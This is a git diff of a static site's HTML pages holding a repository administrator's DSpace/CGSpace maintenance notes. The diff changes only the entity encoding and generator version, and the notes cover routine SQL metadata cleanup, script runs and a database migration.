<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open%&#39;;
text_value
-----------------------------
Open Government License 3.0
Open Government License 3.0
(2 rows)
dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
dspace=# UPDATE metadatavalue SET text_value=&#39;OGL-UK-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open Government License 3.0%&#39;;
UPDATE 2
</code></pre><ul>
<li>I created a pull request to add the license and merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/440">#440</a>)</li>
@ -338,12 +338,12 @@ UPDATE 2
<ul>
<li>I ran the <code>dspace cleanup</code> process on CGSpace (linode18) and had an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(179441) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(179441) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to delete that bitstream manually:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);&#39;
UPDATE 1
</code></pre><ul>
<li>Adjust <a href="/cgspace-notes/cgspace-cgcorev2-migration/">CG Core v2 migrataion notes</a> to use <code>cg.review-status</code> instead of <code>cg.peer-reviewed</code>

View File

@ -56,7 +56,7 @@ I tweeted the CGSpace repository link
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,7 +166,7 @@ I tweeted the CGSpace repository link
<ul>
<li>Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
COPY 68790
</code></pre><ul>
<li>As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:</li>
@ -176,10 +176,10 @@ iconv: illegal input sequence at position 104779
</code></pre><ul>
<li>According to <a href="https://www.datafix.com.au/BASHing/2018-09-13.html">this trick</a> the troublesome character is on line 5227:</li>
</ul>
<pre tabindex="0"><code>$ awk 'END {print NR&quot;: &quot;$0}' /tmp/2020-01-08-authors-windows.csv
5227: &quot;Oue
$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &quot;
<pre tabindex="0"><code>$ awk &#39;END {print NR&#34;: &#34;$0}&#39; /tmp/2020-01-08-authors-windows.csv
5227: &#34;Oue
$ sed -n &#39;5227p&#39; /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &#34;
00000001: 4f O
00000002: 75 u
00000003: 65 e
@ -225,30 +225,30 @@ java.net.SocketTimeoutException: Read timed out
</ul>
</li>
</ul>
<pre tabindex="0"><code>In [7]: unicodedata.is_normalized('NFC', 'é')
<pre tabindex="0"><code>In [7]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;&#39;)
Out[7]: False
In [8]: unicodedata.is_normalized('NFC', 'é')
In [8]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
Out[8]: True
</code></pre><h2 id="2020-01-15">2020-01-15</h2>
<ul>
<li>I added support for Unicode normalization to my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> tool in <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.0">v0.4.0</a></li>
<li>Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ilri&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ilri&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
COPY 144
dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.bioversity&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.bioversity&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
COPY 1325
</code></pre><ul>
<li>She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC</li>
<li>I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my <code>fix-metadata.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
</code></pre><h2 id="2020-01-16">2020-01-16</h2>
<ul>
<li>Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ciat&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ciat&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
COPY 35
</code></pre><ul>
<li>Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls)
@ -315,15 +315,15 @@ COPY 35
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct -d
</code></pre><ul>
<li>Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a>:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
COPY 67314
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],dc.contributor.author&#39;
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Peter asked me to send him a list of affiliations to correct
<ul>
@ -331,11 +331,11 @@ $ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, text_value as &quot;correct&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, text_value as &#34;correct&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6170
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -n
</code></pre><ul>
<li>I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:</li>
</ul>
@ -343,7 +343,7 @@ $ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dsp
</code></pre><ul>
<li>Then I generated a new list for Peter:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6162
</code></pre><ul>
<li>Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author &ldquo;Hung, Nguyen&rdquo;
@ -352,8 +352,8 @@ COPY 6162
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E &#39;s/10568 ([0-9]+)/10568\/\1/&#39; | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE &#39;10568\/[0-9]+&#39; hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
$ wc -l hung-nguyen-a*handles.txt
46 hung-nguyen-ares-handles.txt
56 hung-nguyen-atmire-handles.txt
@ -374,7 +374,7 @@ $ wc -l hung-nguyen-a*handles.txt
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2020:0[12345678]&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2020:0[12345678]&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The top two hosts according to the amount of data transferred are:
<ul>
@ -404,9 +404,9 @@ $ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
<li>The file size is about double the old ones, but the quality is very good and the file size is nowhere near ilri.org&rsquo;s 400KiB PNG!</li>
<li>Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2020-01-26">2020-01-26</h2>
<ul>
<li>Add &ldquo;Gender&rdquo; to controlled vocabulary for CRPs (<a href="https://github.com/ilri/DSpace/pull/442">#442</a>)</li>
@ -426,9 +426,9 @@ $ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db
</code></pre><ul>
<li>One thing worth mentioning was this syntax for extracting bits from JSON in bash using <code>jq</code>:</li>
</ul>
<pre tabindex="0"><code>$ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;) | .retrieveLink'
&quot;/bitstreams/172559/retrieve&quot;
<pre tabindex="0"><code>$ RESPONSE=$(curl -s &#39;https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams&#39;)
$ echo $RESPONSE | jq &#39;.bitstreams[] | select(.bundleName==&#34;ORIGINAL&#34;) | .retrieveLink&#39;
&#34;/bitstreams/172559/retrieve&#34;
</code></pre><h2 id="2020-01-27">2020-01-27</h2>
<ul>
<li>Bizu has been having problems when she logs into CGSpace, she can&rsquo;t see the community list on the front page
@ -439,7 +439,7 @@ $ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;)
</li>
</ul>
<pre tabindex="0"><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] &#39;: too many boolean clauses
</code></pre><ul>
<li>Now this appears to be a Solr limit of some kind (&ldquo;too many boolean clauses&rdquo;)
<ul>
@ -453,7 +453,7 @@ org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError:
<ul>
<li>Generate a list of CIP subjects for Abenet:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.cip&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.cip&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
COPY 77
</code></pre><ul>
<li>Start looking over the IITA records from earlier this month (<a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a>)
@ -483,33 +483,33 @@ COPY 77
<ul>
<li>Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:</li>
</ul>
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://www.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.youtube.com&#39;, &#39;https://www.youtube.com&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.youtube.com%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.slideshare.net&#39;, &#39;https://www.slideshare.net&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.slideshare.net%&#39;;
</code></pre><ul>
<li>I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &quot;id&quot;, text_value as &quot;dc.identifier.issn&quot; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &#34;id&#34;, text_value as &#34;dc.identifier.issn&#34; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
COPY 23339
</code></pre><ul>
<li>Then, after spending two hours correcting 1,000 ISSNs I realized that I need to normalize the <code>text_lang</code> fields in the database first or else these will all look like changes due to the &ldquo;en_US&rdquo; and NULL, etc (for both ISSN and ISBN):</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
UPDATE 30454
</code></pre><ul>
<li>Then I realized that my initial PostgreSQL query wasn&rsquo;t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when <code>dspace metadata-import</code> sees it, the change will be removed and added, or added and removed, depending on the order it is seen!</li>
<li>A better course of action is to select the distinct ones and then correct them using <code>fix-metadata-values.py</code>&hellip;</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.identifier.issn[en_US]&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.identifier.issn[en_US]&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
COPY 2900
</code></pre><ul>
<li>I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later</li>
<li>Then I applied 181 fixes for ISSNs using <code>fix-metadata-values.py</code> on DSpace Test and CGSpace (after testing locally):</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p &#39;fuuu&#39; -f &#39;dc.identifier.issn[en_US]&#39; -m 21 -t correct -d
</code></pre><h2 id="2020-01-30">2020-01-30</h2>
<ul>
<li>About to start working on the DSpace 6 port and I&rsquo;m looking at commits that are in the not-yet-tagged DSpace 6.4:

View File

@ -38,7 +38,7 @@ The code finally builds and runs with a fresh install
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -153,7 +153,7 @@ CREATE EXTENSION pgcrypto;
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
<pre tabindex="0"><code>dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
</code></pre><ul>
<li>Then I ran <code>dspace database migrate</code> and got an error:</li>
</ul>
@ -260,17 +260,17 @@ org.dspace.discovery.SearchServiceException: Invalid UUID string: 111210
<li>If I look in Solr&rsquo;s search core I do actually see items with integers for their resource ID, which I think are all supposed to be UUIDs now&hellip;</li>
<li>I dropped all the documents in the search core:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8080/solr/search/update?stream.body=&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&amp;commit=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8080/solr/search/update?stream.body=&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
</code></pre><ul>
<li>Still didn&rsquo;t work, so I&rsquo;m going to try a clean database import and migration:</li>
</ul>
<pre tabindex="0"><code>$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost dspace_2020-01-27.backup
$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres dspace63
dspace63=# CREATE EXTENSION pgcrypto;
dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
dspace63=# DELETE FROM schema_version WHERE version IN (&#39;5.0.2015.01.27&#39;, &#39;5.6.2015.12.03.2&#39;, &#39;5.6.2016.08.08&#39;, &#39;5.0.2017.04.28&#39;, &#39;5.0.2017.09.25&#39;, &#39;5.8.2015.12.03.3&#39;);
dspace63=# DROP VIEW eperson_metadata;
dspace63=# \q
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
@ -365,22 +365,22 @@ $ podman run --name dspacedb10 -v dspacedb_data:/var/lib/postgresql/data -e POST
$ createuser -h localhost -U postgres --pwprompt dspacetest
